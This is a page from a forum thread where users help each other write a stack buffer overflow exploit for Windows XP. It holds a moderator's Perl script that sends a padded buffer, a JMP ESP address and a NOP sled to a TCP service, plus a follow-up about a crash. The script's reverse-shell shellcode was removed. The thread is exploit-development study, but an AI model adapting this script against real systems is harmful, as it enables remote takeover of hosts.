Page 3 of 3 FirstFirst 123
Results 21 to 22 of 22

Thread: help in writing exploits stack overflow on xp sp2

  1. #21
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Try this code, just change the EIP so that it points to a correct "JMP ESP". Mine will most likely not work. You can also check the DB on the metasploit site which will provide you with the necessary address.
    #!/usr/bin/perl
    #

    use IO::Socket;

    $sock = IO::Socket::INET->new(PeerAddr => '<target IP>',
    PeerPort => '200',
    Proto => 'tcp');

    $eip = "\x47\x74\xD2\x77"; #Jmp ESP

    # windows/shell_reverse_tcp - 287 bytes
    # http://www.metasploit.com
    # EXITFUNC=seh, LPORT=4444, LHOST=XXX.XXX.XXX.XXX
    Removed the shellcode. Just use msfpayload to create one.

    $pattern = "A" x 524;
    $pattern .= $eip;
    $pattern .= "\x90" x 20;
    $pattern .= $sc;


    print $sock $pattern;

    while (<$sock>){
    print;
    }
    Tiocfaidh ár lá

  2. #22
    Just burned his ISO
    Join Date
    Jan 2007
    Posts
    9

    Default

    I tried to run the program in xp sp1 .As return address i used addres of stack adjustment that will move down furthur to stack i mean pop ebx ,ret.

    I see eip overwritten by 90909090 and the error thrown is this address is not readable.
    Please suggest something on this.

    Quote Originally Posted by KMDave View Post
    Try this code, just change the EIP so that it points to a correct "JMP ESP". Mine will most likely not work. You can also check the DB on the metasploit site which will provide you with the necessary address.
    I tried to run the program in xp sp1 .As return address i used addres of stack adjustment that will move down furthur to stack i mean pop ebx ,ret.

    I see eip overwritten by 90909090 and the error thrown is this address is not readable.
    Please suggest something on this.

Page 3 of 3 FirstFirst 123

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •